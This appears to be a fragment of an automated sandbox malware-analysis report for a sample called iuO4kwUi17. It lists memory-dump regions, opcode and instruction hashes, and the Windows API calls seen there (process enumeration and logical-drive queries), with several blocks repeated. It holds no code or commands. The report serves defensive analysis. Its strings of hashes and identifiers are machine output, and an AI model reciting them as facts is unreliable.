                                    • Opcode Fuzzy Hash: 8b436dd42b6a20e983d0b4f02b452ae33bb1e6b2c9181f634b5d31fde45257d9
                                    • Instruction Fuzzy Hash: 525139FB16C220BEA14A85855F50AFB676EF2D7330F308926F40FDA6C2E3E44A091171
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 1925aa433bda020a9e714c3b32c13f6a9c0e146c08367c0d4bc35d512db0c145
                                    • Instruction ID: 7d7a1e9066a06bd696f5eb756356d3f8623a7a89992415f7a371bce500e460af
                                    • Opcode Fuzzy Hash: 1925aa433bda020a9e714c3b32c13f6a9c0e146c08367c0d4bc35d512db0c145
                                    • Instruction Fuzzy Hash: 055137FB16C220BEA14A85855F50AFB676EF2D7730F308926F40FDA6C2E3E54A095171
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7ae6a6ae0ee5c7c5ebce7f371f342d921ba00fe2e0007b9b5c4bc13bf6452363
                                    • Instruction ID: 8a941f53e76bbad6c91147d7a905edac7ecb0479ed56008fdddfcc3e7f95dc1a
                                    • Opcode Fuzzy Hash: 7ae6a6ae0ee5c7c5ebce7f371f342d921ba00fe2e0007b9b5c4bc13bf6452363
                                    • Instruction Fuzzy Hash: E15129EB25D121BDB14291426F24AFB576EE5D3730B38C82BF90BD6587E3880E4E1031
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 00fadb0278eed9b437fc9bb5dd00af03dcec469789b1acab52cedc201f065db6
                                    • Instruction ID: de858fc140427fc2d731991dbb1bacc43506d9022e12f0c8410cd254976a285a
                                    • Opcode Fuzzy Hash: 00fadb0278eed9b437fc9bb5dd00af03dcec469789b1acab52cedc201f065db6
                                    • Instruction Fuzzy Hash: 0F01DBDBA2C110BDA04954E42F60AF6172EF5E77307308E66F80FD59C6F6D48A090375
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: 8a044eb9d2e9f9ee12981ba05041820bba15057bfb2567da72b803a4eb0cd568
                                    • Instruction ID: 2bc5622282ddf7fecad75ed6ad319d943e4abebb69df1735f615eeb7143c4c18
                                    • Opcode Fuzzy Hash: 8a044eb9d2e9f9ee12981ba05041820bba15057bfb2567da72b803a4eb0cd568
                                    • Instruction Fuzzy Hash: F401B1E7A1C262BEA301C5A96B508FF2BACF5C32307318877F906C6189F2944D055232